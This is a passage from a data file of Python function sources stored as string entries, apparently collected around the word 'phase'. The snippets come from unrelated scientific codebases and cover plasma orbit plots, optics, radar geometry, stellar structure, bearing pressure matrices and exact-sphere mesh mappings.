Bmax={:.2f}; B={:.2f}'.format(Bmin, Bmax, B0))\n print('gax={:.2f}; gedge={:.2f}; B0R0={:.2f}'.format(g0, gedge, R0*B0))\n print('psiw={:.2f}; psiax={:.2f}; psi={:.2f}'.format(psiw, psia, np.mean(psi)))\n print('E={:.2e}'.format(E)) #E Looks ok.\n print()\n print('zero with bmin {:.3f}'.format(-1-np.sqrt(2*E)*gedge/(psiw*Bmin)))\n print('zero with bmin {:.3f}'.format(-1+np.sqrt(2*E)*gedge/(psiw*Bmin)))\n print('max with Bmin {:.3f}'.format(1/Bmin))\n print('zero with bmax {:.3f}'.format(-1-np.sqrt(2*E)*gedge/(psiw*Bmax)))\n print('zero with bmax {:.3f}'.format(-1+np.sqrt(2*E)*gedge/(psiw*Bmax)))\n print('max with Bmax {:.3f}'.format(1/Bmax))\n\n # Defining p_xi/psi_W\n x = np.linspace(-2., 1, 500)\n #Right hand edge of midplane\n #These functions should plot mu/E. 
You must retrieve mu/E from equations at page\n # 85 of RW book\n copss_lost = 1./Bmin-(1.+x)**2*(Bmin*psiw*psiw)/(2*gedge*gedge*E)\n # copss_lost*B0=1/(Bmin)-(Bmin/2.)*(psi**2*(1+x)**2)/(2*(R0*B0*gedge)**2*E)\n cntrpss_lost = 1/Bmax-(Bmax)*(psiw**2*(1+x)**2)/(2*gedge**2*E)\n magaxis = 1-(x*psiw)**2/(2*E*g0**2)\n #Normalization\n #Trapped/passing boundary - UPPER\n trpp_up={}\n #step 1: find R(z=0, theta=0) at the psi wanted\n psi_z0 = psi2d_param(R_notnorm[R_notnorm>=R0], 0)\n #Normalization\n psi_z0 = np.abs(psi_z0/R0*R0*B0)\n psi_z0 = psi_z0[psi_z0<1.]\n trpp_up['x'] = -1.*psi_z0;\n \n # step 2 : find B at the R>R0, with normalizations\n B_theta0 = B_param(np.linspace(R0, max(R_notnorm), np.size(psi_z0)), 0); B_theta0/=B0;\n trpp_up['y'] = (1./B_theta0);\n \n #Trapped/passing boundary - LOWER\n trpp_down={}\n #step 1: find R(z=0, theta=pi) at the psi wanted\n psi_zpi = psi2d_param(R_notnorm[R_notnorm<=R0], 0)\n #Normalization\n psi_zpi = np.abs(psi_zpi/R0*R0*B0)\n psi_zpi = psi_zpi[psi_zpi<1.]\n trpp_down['x'] = -1.*psi_zpi;\n # step 2 : find B at the R>R0, with normalizations\n B_thetapi = B_param(np.linspace(min(R_notnorm), R0, np.size(psi_zpi)), 0); B_thetapi/=B0;\n trpp_down['y'] = (1/B_thetapi);\n\n if plot:\n f=plt.figure(figsize=(8,6))\n ax=f.add_subplot(111)\n ax.plot(x, copss_lost, 'k')\n ax.plot(x, cntrpss_lost,'k')\n ax.plot(x, magaxis,'b')\n ax.plot(trpp_up['x'], trpp_up['y'],'r')\n ax.plot(trpp_down['x'], trpp_down['y'],'r')\n ax.plot([-1,-1], [max(copss_lost), max(cntrpss_lost)], 'k--')\n ax.set_title(r'E={:.2f} keV'.format(Ekev))\n ax.set_xlabel(r'P$_\\phi$/$\\psi_w$')\n ax.set_ylabel(r'$\\mu\\frac{B_0}{E}$')\n ax.set_ylim([0, 1.5]); ax.set_xlim([-2, 1.])\n ax.grid('on')\n f.tight_layout()\n #f.savefig('COM_{:s}_E{:.2f}.png'.format(fname_eqdsk, Ekev), dpi=800)\n plt.show()\n \n return b, R0, B0", "def end_phase():\n pass", "def iq_phase_trim(self):\n return (self._read(0x14, 0, 0xFF) << 1) | self._read(0x15, 7, 0x80)", "def get_spectral_phase_expansion(self, orders=4, prefix=1e12):\n if self.Et is not None:\n w = self.w\n ph = self.get_trace_spectral_phase()\n ph_ind = np.isfinite(ph)\n ph_good = ph[ph_ind]\n w_good = w[ph_ind] / prefix\n ph_poly = np.polyfit(w_good, ph_good, orders)\n else:\n ph_poly = None\n return ph_poly", "def estimate_phase(img_ft, sim_frq, dxy):\n ny, nx = img_ft.shape\n fx = tools.get_fft_frqs(nx, dxy)\n fy = tools.get_fft_frqs(ny, dxy)\n\n phase = np.mod(np.angle(tools.get_peak_value(img_ft, fx, fy, sim_frq, 2)), 2*np.pi)\n\n return phase", "def test_dphase(self):\n model = BDF(debug=False)\n node1, c1, t1 = 100, 3, 0.3\n node2, c2, t2 = 101, 4, 0.4\n sid = 42\n card_lines = ['DPHASE', sid, node1, c1, t1, node2, c2, t2]\n model.add_card(card_lines, card_lines[0], comment='', is_list=True,\n has_none=True)\n model.add_grid(100, [0., 0., 0.])\n model.add_grid(101, [0., 0., 0.])\n model.validate()\n model.cross_reference()\n #print(model.dphases[42])\n save_load_deck(model)", "def dihedral_calculator():\n\n\t# Prime with first 3 points\n\tp1 = Vector3((yield None))\n\tp2 = Vector3((yield None))\n\tp3 = Vector3((yield None))\n\n\t# Set up for first angle\n\tlastpoint = p3\n\tlastdisp = p3 - p2\n\tlastnormal = ((p2 - p1) @ lastdisp).normalize()\n\n\tangle = None\n\n\t# For each point starting with the 4th, we can compute a new angle\n\twhile True:\n\n\t\t# Yield the last angle (None the first time), get the next point\n\t\tnextpoint = Vector3((yield angle))\n\n\t\t# Displacement from previous point to current\n\t\tnextdisp = nextpoint - 
lastpoint\n\n\t\t# Normal vector to plane containing last 3 points\n\t\tnextnormal = (lastdisp @ nextdisp).normalize()\n\n\t\t# This one's complicated... see step 3 in source.\n\t\tx = lastnormal * nextnormal\n\t\ty = (lastnormal @ lastdisp.normalize()) * nextnormal\n\t\tangle = -math.atan2(y, x)\n\n\t\t# Current values used as previous in next loop\n\t\tlastpoint = nextpoint\n\t\tlastdisp = nextdisp\n\t\tlastnormal = nextnormal", "def get_space_charge_spect( spect, gamma, direction='forward' ) :\n # Speed of the beam\n beta = np.sqrt(1.-1./gamma**2)\n\n # Propagation direction of the beam\n if direction == 'backward':\n beta *= -1.\n\n # Get the denominator\n K2 = spect.kr**2 + spect.kz**2 * 1./gamma**2\n K2_corrected = np.where( K2 != 0, K2, 1. )\n inv_K2 = np.where( K2 !=0, 1./K2_corrected, 0. )\n\n # Get the potentials\n phi = spect.rho_next[:,:]*inv_K2[:,:]/epsilon_0\n Ap = spect.Jp[:,:]*inv_K2[:,:]*mu_0\n Am = spect.Jm[:,:]*inv_K2[:,:]*mu_0\n Az = spect.Jz[:,:]*inv_K2[:,:]*mu_0\n\n # Deduce the E field\n spect.Ep[:,:] += 0.5*spect.kr * phi + 1.j*beta*c*spect.kz * Ap\n spect.Em[:,:] += -0.5*spect.kr * phi + 1.j*beta*c*spect.kz * Am\n spect.Ez[:,:] += -1.j*spect.kz * phi + 1.j*beta*c*spect.kz * Az\n\n # Deduce the B field\n spect.Bp[:,:] += -0.5j*spect.kr * Az + spect.kz * Ap\n spect.Bm[:,:] += -0.5j*spect.kr * Az - spect.kz * Am\n spect.Bz[:,:] += 1.j*spect.kr * Ap + 1.j*spect.kr * Am", "def phase_center(self):\n try:\n rx_number = extract_channel_number(self.title)\n ph_center = (_np.array(self.GPRI_tx_coord) + _np.array(\n getattr(self, \"GPRI_rx{num}_coord\".format(num=rx_number)))) / 2\n return ph_center\n except AttributeError:\n return 0", "def phasefold(t, P, t0, starting_phase=-0.5):\n t = np.array(t)\n dt = t0shft( np.array(t), P, t0)\n tshift = t + dt\n t_phasefold = np.mod(tshift - starting_phase*P, P) + starting_phase * P\n phase = t_phasefold / P\n cycle = np.floor(tshift/P - starting_phase).astype(int)\n return t_phasefold, phase, cycle", "def mounting_matrix(self):\n # fmt: off\n count = 0\n for x in range(self.ntheta):\n self.M[count][count] = 1\n self.f[count][0] = self.p_in\n count = count + self.nz - 1\n self.M[count][count] = 1\n self.f[count][0] = self.p_out\n count = count + 1\n count = 0\n for x in range(self.nz - 2):\n self.M[self.ntotal - self.nz + 1 + count][1 + count] = 1\n self.M[self.ntotal - self.nz + 1 + count][self.ntotal - self.nz + 1 + count] = -1\n count = count + 1\n count = 1\n j = 0\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i][self.ntheta - 1])\n self.M[count][self.ntotal - 2 * self.nz + count] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1, j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][self.ntheta - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = self.nz + 1\n for j in range(1, self.ntheta - 1):\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i, j - 1])\n self.M[count][count - self.nz] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1][j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][j - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / 
self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = count + 2\n count = 1\n for j in range(self.ntheta - 1):\n for i in range(1, self.nz - 1):\n if j == 0:\n self.f[count][0] = (self.c0w[i][j] - self.c0w[i][self.ntheta - 1]) / self.dtheta\n else:\n self.f[count][0] = (self.c0w[i, j] - self.c0w[i, j - 1]) / self.dtheta\n count = count + 1\n count = count + 2\n # fmt: on", "def grad_phi_mesh(self):\n fy = -0.5 * (np.roll(self.phi, 1, axis = 1) - np.roll(self.phi, -1, axis=1)) \n fx = -0.5 * (np.roll(self.phi, 1, axis = 0) - np.roll(self.phi, -1, axis=0))\n return fx,fy", "def focus_field_beam_plane(shape = (128,128),\n units = (.1,.1),\n z = 0.,\n lam = .5, NA = .6, n0 = 1.,\n ex_g = None,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n\n Nx, Ny = shape\n dx, dy = units\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n if ex_g is None:\n use_buffer = False\n ex_g = OCLArray.empty((Ny,Nx),np.complex64)\n else:\n use_buffer = True\n\n assert ex_g.shape[::-1] == shape\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n t = time.time()\n\n p.run_kernel(\"debye_wolf_plane\",(Nx,Ny),None,\n ex_g.data,\n np.float32(1.),np.float32(0.),\n np.float32(-(Nx//2)*dx),np.float32((Nx-1-Nx//2)*dx),\n np.float32(-(Ny//2)*dy),np.float32((Ny-1-Ny//2)*dy),\n np.float32(-z),\n np.float32(lam/n0),\n alpha_g.data, np.int32(len(alphas)))\n\n print(\"time in secs:\" , time.time()-t)\n\n if not use_buffer:\n return ex_g.get()", "def step(self):\n lmax = 32\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r = star.r_coords\n\n def D1(k, n):\n return 1 / 6 * np.sum((mu[2::2] - mu[:-2:2]) *\n (eval_legendre(2 * n, mu[:-2:2]) * star.rho[:-2:2, k] +\n 4 * eval_legendre(2 * n, mu[1:-1:2]) * star.rho[1:-1:2, k] +\n eval_legendre(2 * n, mu[2::2]) * star.rho[2::2, k]))\n\n def D2(n, j):\n sum = 0\n\n def fl(r_dash, r, l=2 * n):\n if r_dash < r:\n return r_dash**(l + 2) / r**(l + 1)\n else:\n return r**l / r_dash**(l - 1)\n\n for k in range(0, N - 2, 2):\n sum += (r[k + 2] - r[k]) * (fl(r[k], r[j]) * D1(k, n) +\n 4 * fl(r[k + 1], r[j]) * D1(k + 1, n) +\n fl(r[k + 2], r[j]) * D1(k + 2, n))\n\n return sum / 6\n\n def calc_Phi(i, j):\n Phi = 0\n\n for n in range(lmax + 1):\n Phi -= 4 * np.pi * D2(n, j) * eval_legendre(2 * n, mu[i])\n\n return Phi\n\n # calculate Phi across grid\n for n in range(N):\n for k in range(K):\n star.Phi[k, n] = calc_Phi(k, n)\n\n # print(f'Phi = {star.Phi[0,:]}')\n\n # update the enthalpy\n\n Omega2 = star.eos.Omega2(star.Phi, star.Psi)\n C = star.eos.C(star.Phi, star.Psi)\n\n H = C - star.Phi - Omega2 * star.Psi\n\n # use new enthalpy and Phi to calculate the density\n\n star.rho = star.eos.rho_from_h(H)\n star.rho /= np.max(star.rho)\n\n # print(f\"rho = {np.average(star.rho, axis=0)}\")\n\n # calculate the errors\n\n H_err = np.max(np.abs(H - star.H)) / np.max(np.abs(H))\n\n if np.max(Omega2) == 0:\n if np.abs(Omega2 - star.Omega2) == 0:\n Omega2_err = 0\n else:\n Omega2_err = 1\n else:\n Omega2_err = np.abs(Omega2 - star.Omega2) / np.abs(Omega2)\n\n if np.max(star.C) == 0:\n if np.abs(C - star.C) == 0:\n C_err = 0\n else:\n C_err = 1\n else:\n C_err = np.abs(C - star.C) / np.abs(star.C)\n\n # set variables to new values\n\n star.H = H\n star.Omega2 = Omega2\n star.C = C\n print(\n f\"Errors: H_err = {H_err}, Omega2_err = 
{Omega2_err}, C_err = {C_err}\")\n\n return H_err, Omega2_err, C_err", "def d4in():\n\td4x.moveTo(d4x_in)\n\td4y.moveTo(d4y_in)", "def Sphere_ExactSerendipityLagrangeQuad():\n\n mesh = Sphere_CubeToSerendipityLagrangeQuad(1)\n \n ################\n # Modifications for exact sphere\n ################\n # x=+1 side\n def posXvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posXnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = -1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0 * np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0 * yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0 * zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0 * np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posXJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = -1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0 * np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0 * yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0 * zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0 * np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[0].vals = posXvals\n mesh.eList[0].normals = posXnormals\n mesh.eList[0].J = posXJ\n \n def posYvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posYnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = 
np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posYJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[1].vals = posYvals\n mesh.eList[1].normals = posYnormals\n mesh.eList[1].J = posYJ\n \n # x=-1 side\n def negXvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def negXnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negXJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[2].vals = negXvals\n mesh.eList[2].normals = negXnormals\n mesh.eList[2].J = negXJ\n\n # y=-1 side\n def negYvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 
+ xx*yy/3.0)\n return np.vstack([x,y,z])\n def negYnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2; \n dxdxi1 = -1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*0.5*xb*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5*(-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0*0.5*zb*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5*(-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0) \n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negYJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2; \n dxdxi1 = -1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*0.5*xb*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5*(-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0*0.5*zb*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5*(-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0) \n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[3].vals = negYvals\n mesh.eList[3].normals = negYnormals\n mesh.eList[3].J = negYJ\n \n # z=+1 side\n def posZvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1)\n yb=np.array(-xi2)\n zb=np.ones(xi1.shape)\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posZnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(-xi2);zb=np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = -1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = -1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = -1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posZJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(-xi2);zb=np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = -1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 